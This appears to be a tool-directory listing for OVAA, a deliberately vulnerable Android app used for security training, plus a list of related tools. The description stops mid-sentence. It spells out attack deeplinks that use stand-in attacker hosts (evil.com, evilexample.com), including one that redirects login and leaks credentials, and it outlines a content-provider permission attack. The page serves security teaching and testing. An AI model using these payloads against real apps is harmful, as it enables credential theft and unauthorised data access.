OVAA (Oversecured Vulnerable Android App) Logo

OVAA (Oversecured Vulnerable Android App)

0
Free
Visit Website

OVAA (Oversecured Vulnerable Android App) is an Android app that aggregates all the platform's known and popular security vulnerabilities. List of vulnerabilities: - Installation of an arbitrary login_url via deeplink oversecured://ovaa/login?url=http://evil.com/ leads to the user's user name and password being leaked when they log in. - Obtaining access to arbitrary content providers (not exported, but with the attribute android:grantUriPermissions="true") via deeplink oversecured://ovaa/grant_uri_permissions. The attacker's app needs to process oversecured.ovaa.action.GRANT_PERMISSIONS and pass intent to setResult(code, intent) with flags such as Intent.FLAG_GRANT_READ_URI_PERMISSION and the URI of the content provider. - Vulnerable host validation when processing deeplink oversecured://ovaa/webview?url=.... - Opening arbitrary URLs via deeplink oversecured://ovaa/webview?url=http://evilexample.com. An attacker can use the vulnerable WebView setting WebSettings.setAllowFileAccessFromFileURLs(

FEATURES

ALTERNATIVES

DroidBox is a tool for dynamic analysis of Android applications, providing insights into package behavior and security.

A project providing a low-cost ICS testbed with affordable hardware, instructions, and attacker scenarios to facilitate learning in industrial security.

iOS Reverse Engineering Toolkit for automating common tasks in iOS penetration testing.

A Graphical Realism Framework for Industrial Control Simulation organized as 5 VirtualBox VMs for realistic ICS network simulation.

Altoro Mutual offers online banking, real estate financing, business credit cards, retirement solutions, and prioritizes privacy and security.

A Python tool for patching Dalvik bytecode in DEX files and assisting in Android application analysis

A data-mining and deep web asset search engine for breach analysis and prevention services.

AVEVA is a global leader in industrial software offering solutions for various industries and specializing in engineering, operations, data management, and digital transformation.

PINNED